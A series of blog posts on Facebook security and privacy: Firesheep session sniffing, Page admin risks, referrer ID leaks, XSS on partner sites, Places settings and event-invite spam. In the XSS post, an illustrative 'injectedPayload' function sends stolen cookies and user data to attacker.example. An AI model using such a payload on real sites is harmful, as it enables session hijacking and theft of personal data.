Why Should the CSO Care About an Employee’s Personal Social Media Account?

Thank you to Tom for allowing me to participate with SocialMediaSecurity.com. The guys in this community have been great resources in helping me spread the word about the insecurities of social media. This year I have been reaching beyond the security space, speaking at social media clubs, PodCamps, and O’Reilly conferences, only to realize something disheartening: not enough people are hearing us or listening to us! I am going to start posting some real experiences to help answer the question, “Why should I care about social media security?”

This week at PodCamp Nashville I was able to demo Firesheep, and in 3 minutes and 48 seconds, 64 accounts were sitting in my sidebar waiting for me to double-click. After the demo I fielded some great questions, and just like that the session was over. Later a young lady came to me and admitted she was one of the 64 in the sidebar. She asked me to show her what I could have done with her account. She was not really impressed or scared that I could have updated her profile, chatted with her friends, or added creepy users. The fear came very quickly when I switched from her user account to the Pages she had admin rights to.

She is in charge of the Facebook Pages of 12 major medical practices in the area, and I have to be honest, she rocked at maintaining them. Impressed by her work, I asked how much time she had invested in these pages and their followers. The answer was in the thousands of hours, and in the $100,000 range of billable time. My final question to her was: what would she do if all of this time and money came crashing down because some idiot at a camp ran a free Firefox plug-in? She said she would hunt them down. She was kidding, of course, but to be honest I was a little scared. We went over some settings, and she is now going to help spread the word. One out of 64 down.
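For those curious about the mechanics: Firesheep simply automates sniffing session cookies that websites send over unencrypted HTTP on open Wi-Fi. For site operators, the relevant defense is serving sessions only over HTTPS and marking cookies accordingly. Here is a minimal sketch (TypeScript with Express; the route and cookie name are illustrative, not drawn from any particular site):

```typescript
import express from "express";

const app = express();

app.get("/login", (_req, res) => {
  // Firesheep works because many sites sent session cookies over plain HTTP,
  // where anyone on the same open Wi-Fi network can read them.
  // "secure" keeps the cookie off unencrypted connections; "httpOnly" keeps
  // page scripts from reading it.
  res.cookie("session_id", "example-session-token", {
    secure: true,
    httpOnly: true,
  });
  res.send("logged in");
});

app.listen(3000);
```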

The security of a Facebook Page rests almost entirely on the personal accounts of its admins. This is one reason why the CSO should care…

Things that make you go HMMMM? (point to head) – Arsenio Hall
Facebook’s terms and conditions state that you must have a personal Facebook account to administer your company Page. Company Pages allow multiple users to have access and share content. Are you monitoring whether the people with that access meet your company’s security standards? When an employee leaves, is Facebook Page access part of the account removal process?
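One way to make that part of the offboarding checklist is to periodically pull the list of people who hold a role on each corporate Page and compare it against the current employee roster. A rough sketch of the idea follows; the Graph API `roles` edge, the token handling, and matching by name are assumptions for illustration rather than a verified recipe:

```typescript
// Illustrative sketch: list everyone with a role on a corporate Facebook Page
// and flag anyone who no longer appears in the employee roster.
// Assumes a valid Page access token and a "roles"-style edge on the Page object.
const PAGE_ID = "YOUR_PAGE_ID";       // placeholder
const PAGE_TOKEN = "YOUR_PAGE_TOKEN"; // placeholder
const currentEmployees = new Set(["Jane Doe", "John Smith"]); // from your HR system

async function auditPageAdmins(): Promise<void> {
  const url = `https://graph.facebook.com/${PAGE_ID}/roles?access_token=${PAGE_TOKEN}`;
  const response = await fetch(url);
  const body = (await response.json()) as { data?: { id: string; name: string }[] };

  for (const person of body.data ?? []) {
    if (!currentEmployees.has(person.name)) {
      console.warn(`Page admin not in employee roster: ${person.name} (${person.id})`);
    }
  }
}

auditPageAdmins().catch(console.error);
```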

Looking at Facebook’s Strategy and Possible New Directions

Over the last few months, Facebook has rolled out several significant new features, such as Places and the updated Groups. On Monday, Facebook is holding another event to announce what many expect to be an improved messaging feature. As I’ve watched these changes, I’ve been thinking about where Facebook might be headed.

At first, I started to think Facebook was simply looking to extend its reach by acting as an invisible layer of sorts. Anil Dash once talked about Facebook melting into the larger Web, but perhaps Facebook would end up becoming part of the underlying fabric of the Internet. In past public appearances, Facebook CEO Mark Zuckerberg seemed to be the kind of person who was content to remain in the background, and the company’s strategy seemed to reflect a similar style. I’ve mentioned before the idea of Facebook becoming an identity layer on the Internet, and innovations such as the Graph API have made it easier than ever for sites to integrate with Facebook.
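Part of what makes that integration so easy is the Graph API’s simplicity: a public object is just a JSON document at a predictable URL. A minimal sketch of what a third-party site’s lookup looks like (at the time of writing, public objects could be read without a token; the object name below is only an example):

```typescript
// Fetch the public representation of a Facebook object from the Graph API.
// Public objects are plain JSON at https://graph.facebook.com/{id-or-username}.
async function fetchPublicObject(objectId: string): Promise<unknown> {
  const response = await fetch(`https://graph.facebook.com/${objectId}`);
  if (!response.ok) {
    throw new Error(`Graph API request failed: ${response.status}`);
  }
  return response.json();
}

// Example: look up a public Page by its username.
fetchPublicObject("cocacola").then(console.log).catch(console.error);
```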

But Facebook’s updated Groups feature changed my perspective, since it added functionality that would drive users back to facebook.com. Of course, the upgrade did enable e-mail as a way of interacting with groups. In some ways, Facebook’s overall strategy could be compared to Google’s. Years ago, many sites focused on “stickiness,” trying to keep users hooked. By contrast, Google drove users away by providing relevant links to other sites. But to see Google as non-sticky would be an oversimplification. In fact, the company built a successful ad network that extended its reach across the web. Also, Google has created a number of other products that many people stay logged into, such as Gmail.

And now, people are expecting Facebook to announce a web-based e-mail client that will compete with Gmail. I’m predicting that Facebook will roll out a new messaging system, but it won’t be a Gmail clone or simply another client for managing traditional POP/IMAP e-mail. That’s not to say there won’t be any e-mail gateway, but I think Facebook’s plans will go much further. I’m guessing that at least part of the new system will involve somehow extending private messaging features across Facebook-integrated websites.

In any event, I think Facebook’s announcement will include at least a few surprises for those who have been discussing the possibilities. Facebook has a history of introducing features that aren’t quite what people expected – and often end up leading to practical implementations of ideas that were previously niche experiments. Personally, I think it’s a bit short-sighted to think that Facebook would simply join the market for web-based e-mail without trying to reinvent it, especially given the service’s cautiousness about past features that allowed or potentially allowed spam-like behaviors.

Facebook has also been accused many times of somehow standing in opposition to “openness.” Personally, I think the term has become a buzzword that’s often used without much specificity. And even though I’ve often been a critic of Facebook, I do think many of the accusations aren’t entirely fair. From RSS feeds to developer APIs, Facebook has opened up data in ways that many other sites can’t claim. Today’s Facebook is certainly far more “open” than it was years ago – in fact, I would argue that the site has at times been too open lately, such as when some user data became reclassified as “publicly available” last fall. But regardless of Facebook’s degree of openness, the company has always been careful to maintain a high degree of control over information and features on the site. This can be positive, such as quickly removing malware links, or negative, such as controversial decisions to bar users or certain content.

Either way, that control has helped the site build a powerful database of profiles that generally reflects real people and real relationships. That’s part of what fascinated me about the site’s recent spat with Google over contact information. In the past, a list of e-mail addresses was about the only semi-reliable way to identify a group of people across the Internet. Now, many sites rely on Facebook’s social graph for that function. In terms of identity, the value of e-mail addresses has declined, and I don’t think exporting them from Facebook would provide as much value as Google might think. On the other hand, Google may realize this and be so concerned about the shift that they’re trying to curb Facebook’s influence. This would especially make sense if Google intends to introduce a more comprehensive social networking product that would need e-mail addresses as a starting point. Regardless, I’m sure Google feels threatened by the prospect of Facebook providing a better alternative to traditional e-mail – a change that would only bolster the value of a Facebook profile as the primary way to identify a typical Internet user.

Thoughts on the Wall Street Journal’s Facebook Investigation

A front-page story in last Monday’s Wall Street Journal declared a “privacy breach” of Facebook information based on an investigation conducted by the paper. The Journal found that third-party applications using the Facebook Platform were leaking users’ Facebook IDs to other companies, such as advertising networks.

The report generated controversy across the Web, and some reactions were strongly negative. On TechCrunch, Michael Arrington dismissed the article as alarmist and overblown. Forbes’ Kashmir Hill surveyed other responses, including a conversation on Twitter between Jeff Jarvis and Henry Blodget, and expressed skepticism over the Journal’s tone.

I’ve been a bit surprised by the degree to which some have written off the Journal’s coverage. Some may disagree with the label of “privacy breach,” but I thought the report laid out the issues well and did not paint the problem as a conspiracy on the part of Facebook or application developers. Either way, I’m glad to see that the article has sparked renewed conversation about shortcomings of web applications and databases of information about web users. Also, many may not realize that information leakage on the Facebook Platform has historically been even worse.

Information leakage via a referrer is not a new problem and can certainly affect other websites. But that doesn’t lessen the significance of the behavior observed in the WSJ investigation. Privacy policies are nearly always careful to note that a service does not transfer personally identifiable information to third parties without consent. Online advertising networks often stress the anonymity of their tracking and data collection. The behavior of Facebook applications, even if unintentional, violated the spirit of such statements and the letter of Facebook’s own policies.

Some people downplayed the repercussions of such a scenario on the basis that it did not lead to any “private” profile information being transferred to advertisers – a point Facebook was quick to stress. Yet when did that become the bar for our concept of acceptable online privacy? Should other services stop worrying about anonymizing data or identifying users, since now we should only be concerned about “private” content instead of personally identifiable information? Furthermore, keep in mind that Facebook gets to define what’s considered private information in this situation – and that definition has changed over the last few years. At one time in the not-too-distant past, even a user’s name and picture could be classified as private.

Many reactions have noted that a Facebook user’s name and picture are already considered public information, easily accessed via Facebook’s APIs. Or as a Facebook spokesman put it, “I don’t see from a logic standpoint how information available to anyone in the world with an Internet connection can even be ‘breached.’” But this argument fails to address the real problem with leaked IDs in the referrer. The issue was not simply what data applications were leaking, but when and how that data was leaked. The problem was not that advertisers could theoretically figure out your name given an ID number – it’s that they were given a specific ID number at the moment a user accessed a particular page. Essentially, advertisers and tracking networks were able to act as if they were part of Facebook’s instant personalization program. Ads could have theoretically greeted users by name – the provider could connect a specific visit with a specific person.
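To make the mechanism concrete: when the page a user is viewing has the user’s Facebook ID in its URL and that page requests a third-party ad script, the browser typically attaches the full page URL in the Referer header of the ad request. A hedged sketch of what an ad server could log (TypeScript with Express; the URL format and parameter names are illustrative, not the exact strings the Journal observed):

```typescript
import express from "express";

const app = express();

// An ad-network endpoint that reads the Referer header the browser attaches
// to the ad request. If the referring page's URL embeds a Facebook user ID,
// the ad server now knows which user loaded which page, and when.
app.get("/ad.js", (req, res) => {
  const referer = req.get("referer") ?? "";
  const match = referer.match(/(?:user_id|fb_id|id)=(\d+)/); // illustrative parameter names
  if (match) {
    console.log(`Request referred by Facebook user ${match[1]}: ${referer}`);
  }
  res.type("application/javascript").send("/* ad code */");
});

app.listen(8080);
```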

Interestingly enough, many past advertisements in Facebook applications did greet users by name. Some ads also included names and pictures of friends. Facebook took steps several times to quell controversies that arose from such tactics, but I’m not sure many people understood the technical details that enabled such ads. Rather than simply leak a user’s ID, applications were actually passing a value called the session secret to scripts for third-party ad networks.

With a session secret, such networks could (and often did) make requests to the Facebook API for private profile information of both the user and their friends, or even private content, such as photos. Typically, this information was processed client-side and used to dynamically generate advertisements. But no technical limitations prevented ad networks from modifying their code to retrieve the information. In fact, a number of advertisements did send back certain details, such as age or gender.
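The gap between “processed client-side” and “sent back to the ad network” is a single HTTP request. A hedged browser-side sketch of how an ad script that already has profile fields available in the page could report them home (the collection endpoint and field names are hypothetical):

```typescript
// Browser-side sketch: once a third-party script has profile data in hand,
// nothing technical stops it from phoning home. The endpoint and fields
// below are hypothetical.
function beaconProfileData(profile: { age?: number; gender?: string }): void {
  const params = new URLSearchParams();
  if (profile.age !== undefined) params.set("age", String(profile.age));
  if (profile.gender) params.set("gender", profile.gender);

  // A classic "tracking pixel": the data rides along in the image URL.
  new Image().src = `https://ads.example.com/collect?${params.toString()}`;
}

beaconProfileData({ age: 29, gender: "female" });
```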

Changes to the Facebook Platform, such as the introduction of OAuth earlier this year, have led to the deprecation of session secrets and removed this particular problem. I’m not sure how much this sort of information leakage or similar security problems motivated the changes, but problems with session secrets certainly persisted for quite a while before they arrived. If the WSJ had conducted their study a year ago, the results could have been even more worrying.

Still, I’m glad that the Journal’s research has led many to look more closely at the issues they raised. First, the story has drawn attention to more general problems with web applications. Remember, the Web was originally designed for accessing static pages of primarily textual information, not the sort of complex programs found in browsers today. (HTML 2.0 didn’t even have a script tag.) Data leaking via referrers or a page’s scripts all having the same scope are problems that go beyond Facebook apps and will likely lead to more difficulties in the future if not addressed.

Second, people are now investigating silos of information collected about website visitors, such as RapLeaf’s extensive database. Several responses to the Journal piece noted that many such collections of data provide far more detail on web users and are worthy of greater attention. I agree that they deserve scrutiny, and now reporters at the Journal seem to be helping in that regard as well.

We’ve entered an age where we can do things never previously possible. Some of these opportunities are exciting and clearly positive, but others could bring unintended consequences. I think the availability and depth of information about people now being gathered and analyzed falls into the latter category. Perhaps we will soon live in a world where hardly any bit of data is truly private, or perhaps we will reach a more open world through increased sharing of content. But I think it’s well worth our time to stop and think about the ramifications of technological developments before we simply forge ahead with them.

Over the last few years, I’ve tried to bring attention to some of the issues relating to the information Facebook collects and uses. They’re certainly not the only privacy issues relevant to today’s Internet users, and they may not be the most important. But I think they do matter, and as Facebook grows, their importance may increase. Similarly, I think it’s wrong to dismiss the Journal’s investigation as “complete rubbish,” and I look forward to the rest of the dialogue it has now generated.

Instant Personalization Program Gets New Partner, Security Issue

Facebook announced last week that movie information site Rotten Tomatoes would join Docs.com, Pandora, and Yelp as a partner in the social networking service’s “instant personalization” program. Rotten Tomatoes will now be able to automatically identify and access public information for visitors logged in to Facebook, unless those users have opted out of the program. This marks the first new partner since Facebook launched the feature earlier this year.

Soon after that initial roll-out, security researchers noted vulnerabilities on Yelp’s website that allowed an attacker to craft pages which would hijack Yelp’s credentials and gain the same level of access to user data. TechCrunch writer Jason Kincaid reported on the cross-site scripting (XSS) holes, and made this prediction: “I suspect we’ll see similar exploits on Facebook partner sites in the future.”

Kincaid’s suspicions have now been confirmed, as the latest site with instant personalization also had an exploitable XSS vulnerability, which has now been patched. I’ll quickly add that Flixster, the company behind Rotten Tomatoes, has always been very responsive when I’ve contacted them about security issues. They have assured me that they have done XSS testing and prevention, which is more than could be said for many web developers. In posting about this issue, I primarily want to illustrate a larger point about web security.

When I heard about the expansion of instant personalization, I took a look at Rotten Tomatoes to see if any XSS problems might arise. I found one report of an old hole, but it appeared to be patched. After browsing around for a bit, though, I discovered a way I could insert some text into certain pages. At first it appeared that the site properly escaped any characters which could lead to an exploit. But ironically enough, certain unfiltered characters affected a third-party script used by the site in such a way that one could then execute arbitrary scripts. Since I had not seen this hole documented anywhere, I reported it to Rotten Tomatoes, and they promptly worked to fix it.
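For developers, the underlying lesson is an old one: never echo user-supplied input into a page without escaping it for the context where it lands. A minimal illustrative sketch of HTML-escaping reflected input (real sites should lean on their framework’s templating and established sanitization libraries rather than hand-rolled helpers):

```typescript
// Escape the characters that let reflected input break out of an HTML text
// context, so a search term like "<script>alert(1)</script>" is rendered as
// inert text instead of executing.
function escapeHtml(input: string): string {
  return input
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Example: rendering a search-results heading from a user-supplied query.
const query = "<script>alert(1)</script>";
console.log(`<h2>Results for ${escapeHtml(query)}</h2>`);
```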

I’ve long argued that as more sites integrate with Facebook in more ways, we’ll see this type of problem become more common. Vulnerable applications built on the Facebook Platform provided new avenues for accessing and hijacking user accounts; now external websites that connect to Facebook open more possible security issues. As Kincaid noted in May, “Given how common XSS vulnerabilities are, if Facebook expands the program we can likely expect similar exploits. It’s also worth pointing out that some large sites with many Facebook Connect users – like Farmville.com or CNN – could also be susceptible to similar security problems. In short, the system just isn’t very secure.”

Overcoming such weaknesses is not a trivial matter, though, especially given the current architecture of how scripts are handled in a web page. Currently, any included script has essentially the same level of access and control as any other script on the page, including malicious code injected via an XSS vulnerability. If a site uses instant personalization, injected scripts can access the data used by Facebook’s code to enable social features. That’s not Facebook’s fault, and it would be difficult to avoid in any single sign-on infrastructure.
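To illustrate the “same level of access” point: a script injected through an XSS hole runs with exactly the privileges of the scripts the site included on purpose, so anything a first-party or Facebook-provided script exposes in page-level state is within reach. A browser-side sketch (the global variable name is hypothetical, standing in for whatever a personalization script keeps client-side):

```typescript
// Any script running in the page -- including one injected through an XSS
// vulnerability -- shares the same JavaScript scope, cookies, and DOM as
// every other script on that page.
function injectedPayload(): void {
  // Cookies scoped to the site (any that are not marked HttpOnly).
  const cookies = document.cookie;

  // Data another script left in page-level state; "fbUserData" is a
  // hypothetical name for whatever a personalization script stores client-side.
  const sharedState = (window as unknown as { fbUserData?: unknown }).fbUserData;

  // Exfiltrate both to a server the attacker controls.
  new Image().src =
    "https://attacker.example/steal?c=" +
    encodeURIComponent(cookies) +
    "&d=" +
    encodeURIComponent(JSON.stringify(sharedState ?? null));
}
```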

Of course, all of this applies to scripts intentionally included in the page as well, such as ad networks. With the Rotten Tomatoes roll-out, Facebook made clear that “User data is never transferred to ad networks.” Also, “Partner sites follow clear product/security/privacy guidelines,” and I assume Facebook is monitoring their usage. I’m not disputing any of these claims – Facebook is quite correct that advertisers are not getting user data.

But that’s due to policy limitations, not technical restrictions. Rotten Tomatoes includes a number of scripts from external sources for displaying ads or providing various functions. Any of these scripts could theoretically access a Facebook user’s information, though it would almost certainly be removed in short order. I did find it interesting that an external link-sharing widget on the site builds an array of links on the page, including the link to a user’s Facebook profile. This happens client-side, though, and the data is never actually transferred to another server.

I bring up these aspects simply to note the technical challenges involved in this sort of federated system. I think it’s very possible that we will eventually see ad network code on a Facebook-integrated site that tries to load available user data. After all, I’ve observed that behavior in many Facebook applications over the last few years – even after Facebook issued explicit policies against such hijacking.

These dangers are part of the reason why JavaScript guru Douglas Crockford has declared security to be the number one problem with the World Wide Web today. Crockford has even advocated that we halt HTML5 development and focus on improving security in the browser first. While that won’t likely happen, I think Crockford’s concerns are justified and that many web developers have yet to realize how dangerous cross-site scripting can be. Perhaps these issues with instant personalization sites will help increase awareness and understanding of the threat.

Postscript: This morning, an XSS vulnerability on Twitter led to script-based worms (somewhat reminiscent of “samy is my hero”) and general havoc across the site. This particular incident was not related to any mashups, but once again emphasizes the real-world security ramifications of cross-site scripting in a world of mainstream web applications.

Update (Sep. 27): Today news broke that Scribd had also become part of Facebook’s Instant Personalization program. I took a look at the site and discovered within minutes that it had a quite trivial XSS vulnerability. This particular issue should have been obvious given even a basic understanding of application security. It also indicates that Facebook is not doing much to evaluate the security of new instant personalization partners.

Update 2: Scribd patched the most obvious XSS issue right about the time I updated this post: entering HTML into the search box brought up a page that loaded it unfiltered. Another search issue remained, however: starting with a closing script tag would still affect code later in the results page. After about half an hour, that problem was also patched. I’m glad Scribd moved so quickly to fix these problems, but I still find it disconcerting that they were there to start with. I’ve not done any further checking for other XSS issues.

Facebook Privacy & Security Guide Updated to v2.3

Just a quick post that I have updated the Facebook Privacy & Security Guide to include information on configuring the privacy settings for Facebook Places.  You can find this on the first page under “Sharing on Facebook”.  Stay tuned for more information on Facebook Places in the next day or so!

Download the updated Facebook Privacy & Security Guide here (pdf download).

Facebook Places Brings Simple Location Sharing to the Masses

Yesterday, Facebook announced a much-anticipated feature that allows users to easily post their current location on the site. The new setup, known as Facebook Places, works much like other location-based services, such as Foursquare or Gowalla, by letting users “check in” at nearby places. Geolocation providers, such as a mobile phone’s GPS, pinpoint the user, and Localeze provides the initial database of places. Eventually, users will be able to add their own locations to the Facebook map. Inside Facebook has a run-down of the overall functionality.

Facebook also allows your friends to check you in at locations, and these check-ins are indistinguishable from ones you made for yourself. In typical opt-out fashion, you can disable these check-ins via your privacy settings, and you’ll be asked about allowing them the first time a friend checks you in somewhere.

Even if you stop friends from checking you in to places, however, they can still tag you with their check-ins, similar to how friends can tag you in photos or status updates. Such tags will appear on your wall, as tagged status updates do now. You’ll be able to remove tags after the fact, but it doesn’t seem that you’ll be able to prevent friends from tagging you altogether.

Applications have two new permissions related to places. One gives access to your check-ins, the other gives access to your friends’ check-ins as well. Both will appear in the list of requested permissions when you authorize an application, and they are required for API access to check-ins. If your friends grant an application access to friends’ check-ins, you can prevent yours from appearing via “Applications and Websites” privacy controls.

API access is currently read-only – authorized applications can access your check-ins, but can’t submit check-ins to Facebook. That sort of functionality is currently in closed testing, though.
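For developers, reading check-ins looks like any other Graph API call once a user has granted the relevant permission. A hedged sketch (the `checkins` connection and the read-only behavior reflect the launch-era API as described above; the token is a placeholder):

```typescript
// Illustrative sketch: read the authorized user's check-ins via the Graph API.
// Requires an OAuth access token granted with the check-ins permission
// described above; write access is not available at launch.
async function fetchMyCheckins(accessToken: string): Promise<unknown> {
  const url = `https://graph.facebook.com/me/checkins?access_token=${accessToken}`;
  const response = await fetch(url);
  if (!response.ok) {
    throw new Error(`Check-in request failed: ${response.status}`);
  }
  return response.json();
}

fetchMyCheckins("USER_ACCESS_TOKEN").then(console.log).catch(console.error);
```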

ReadWriteWeb has a nice guide to applicable privacy settings. When these controls first appeared on my profile, Facebook set the visibility for all my check-ins to “Friends Only” by default and disabled API access to my check-ins via friends by default. But they also enabled by default another setting which makes individual check-ins visible to anyone nearby at the time, whether friends or not. The option for letting friends check me in was not specifically set, but apparently I would have been prompted the first time a friend checked me in.

According to Facebook, you will only be able to check in at locations near where you are, as determined by the geolocation feature of your browser (or your phone’s GPS for the iPhone app). I’m a bit skeptical about how difficult faking a check-in will be, but I don’t yet have the ability to test that out.

Facebook’s initial geolocation rollout brings a fairly modest feature set, but when integrated with Facebook Pages and made available to a network of 500 million people, the service offers great potential. As with other recent changes, adding check-ins reduces friction for users to share their location and provides Facebook with another valuable set of data about people’s daily activities. It remains to be seen whether users will react with discomfort over the potential for an entirely new meaning of “Facebook stalking” or with excitement over potential new product offerings. Either way, the amount and variety of information under Facebook’s control continues to expand rapidly.

Spam via Facebook Events Highlights Ongoing Challenges

Earlier today, I received an invitation to a Facebook event from “Giovanna” – someone I’d never heard of and certainly never added as a friend. The invite came as a bit of a surprise, since my profile was fairly locked down. While anyone could search for it, all profile information was set to “Friends Only,” and sending messages or making friend requests was limited to “Friends of Friends.” None of my friends seem to know Giovanna, and her profile is probably fake anyway.

The event title proclaimed “iPhone Testers Needed!” and might be enticing to users who want an iPhone. While the event page included more information on the supposed testing program, the invite was followed by a message from the event creator. Once you’re on the guest list for a Facebook event, the event administrators can send out Facebook messages you’ll receive, regardless of privacy settings. This particular message (which also arrived in my e-mail inbox due to notifications settings) included a link to the iPhone opportunity, which unsurprisingly was a typical “offer” page that required me to submit personal information and try out some service before I could get my fancy new phone.

I began investigating how this all happened. When you create a Facebook event and try to invite people, you’ll only see a list of your friends to choose from. But it turns out that on the backend, nothing prevents you from submitting requests directly to Facebook with other people’s Facebook IDs. In my testing, I’ve been able to send event invitations to other users even if we’re not friends and they have tight privacy settings. I’m guessing that using this technique to invite more than a few people could raise a spam alert, but I’m not sure. Also, an event invitation does not give the event creator increased access to any profile information of guests, but as already noted, it does let event administrators send messages to people they might otherwise not be able to contact.

I’m sure Facebook will take action soon to clamp down on this particular loophole, so I think it unlikely we’ll see it exploited too widely. (The iPhone testing event currently has around 1800 guests – significant, but tiny compared to other Facebook scams.) But it does demonstrate the sort of challenges Facebook is having to handle as their network and power expand. Several years ago, when the site was used for little besides keeping in touch with college classmates and other offline friends, Facebook was seen as mostly spam-free, in contrast to services like Myspace. Now that applications, social gaming friends, and corporate brands have all become integral parts of the Facebook experience, black hat marketers keep finding new ways to spread links among users. And worse, those tricks can often be used to spread malware as well.

I do think that Facebook wants to avoid annoying users with spam, and works to prevent your inbox on the site from becoming as flooded as a typical e-mail account. But a network of 500 million people presents a very enticing target, and we’ll keep seeing new scam ideas pop up as Facebook expands and adds features. In the meantime, continue to be wary of any links promising a glamorous reward for free.

Facebook Backtracks on Privacy Controls and Public Information

Facebook CEO Mark Zuckerberg held a press conference today announcing significant changes to the site’s privacy settings. The latest updates come after weeks of debate and criticism over Facebook’s handling of user information. Though it may take several days or weeks to roll out the new controls, an official privacy guide provides a summary of how they work. Full details are still rolling in, but certain aspects are already clear.

First, the new interface for making many changes appears to be much more streamlined. This should be a welcome change to those confused by the previous litany of options. The primary privacy page displays a table with columns for “Everyone,” “Friends of Friends,” and “Friends Only,” with rows for several categories of content. This table not only establishes settings for certain bits of profile information; it also lets users set defaults for new content shared.

Second, Facebook has removed the requirement that “connections,” such as your list of friends and the pages you “like,” always be publicly available information. A secondary page will provide access controls for certain groups of these connections, as well as who can friend you, send you messages, or see your profile in search results.

Third, users will have new options related to third-party applications that integrate with Facebook. The company had previously announced a granular permissions model for applications, and developers are in the process of transitioning to the new setup. Those permissions will now be reflected in the privacy settings, though how that will look is not yet clear. (Also, Facebook’s privacy guide assures users that applications can only request “information that’s needed for them to work,” but that’s up to developers.) Facebook is also re-instating an option to completely opt-out from the Facebook Platform. This setting had been available prior to changes last fall. However, it now appears that this opt-out will also be the only way to avoid public content being indexed by search engines.

Zuckerberg promised an “easy” way to opt out of the controversial instant personalization program, which lets certain third-party websites automatically identify Facebook visitors, but the feature itself remains opt-out rather than opt-in. Many of the other privacy settings are also still opt-out in that the site defaults appear to remain the same, presented as “Recommended” when a new user checks them.

I’ve been concerned about the tone of some Facebook responses to recent privacy concerns, and today’s presentation by Zuckerberg was no exception. He noted that the company had not seen any noticeable impact on site usage lately, and according to one report commented, “Perhaps the personal privacy preferences of liberal advocacy groups and DC politicians don’t match with those of the general public.” That may be true, though I think politicians or privacy advocates have a deeper understanding of recent changes than the general public. Still, this sort of remark comes across as at best somewhat irritated and at worst rather arrogant. It also probably won’t win over any liberal advocacy groups or DC politicians. (For the record, I don’t fall into either category.)

Other aspects of the announcement lead me to wonder how much Facebook truly understands the rising worries over the site’s handling of privacy issues. Zuckerberg emphasized the site’s focus on sharing, asserted that users want to share, and expressed his belief that people want to share more openly. The default privacy options clearly reflect this belief, positioning Facebook as a site generally intended for public sharing.

But I think Zuckerberg is confusing the desire to share easily or freely with the desire to share publicly. Several researchers have explored how people approach privacy, and people constantly use services such as Facebook to post content they would not want distributed to the entire Internet. We’ve become accustomed to the idea of being private in public, since our offline conversations in public settings are not recorded and indexed for anyone to search. What would be the harm to users if content were private by default, but could be opened to the public if the author wanted that? After all, this is how Facebook operated for the first few years of its existence – and it likely played a significant role in the site’s growth.

Of course, while an opt-in approach may help many users, Facebook wants users to share more openly. More public content provides more value for other services that might integrate with Facebook, extending the site’s reach and influence. That’s part of why I find it difficult to simply accept Zuckerberg’s notion that most people are moving towards public sharing on their own: regardless of what individuals think, Facebook itself certainly has an opinion on how much you should share.

And that’s the real question – how much you share, not whether you share. I’ve never been opposed to making it easier for users to share content. But I do have a problem when a site that was built on sharing with a limited audience reorganizes to make that same type of sharing more difficult than fully public sharing – an activity that carries far more potential dangers, both social and otherwise.

Facebook has built an unprecedented audience of users who give it significant trust. I’m glad to see the company making welcome changes which assist users who actively care about privacy controls. But I remain concerned that the company’s overall perspective still reflects questionable ideas, such as the notion that most people are not concerned about privacy, and either fails to recognize the company’s role as a trend-setter or disingenuously downplays it. That’s not a personal attack on Zuckerberg, whom I’ve never met, or anyone else at Facebook. It’s simply my evaluation of the service’s direction based on recent features and public relations. And I think Facebook owes its users much better.
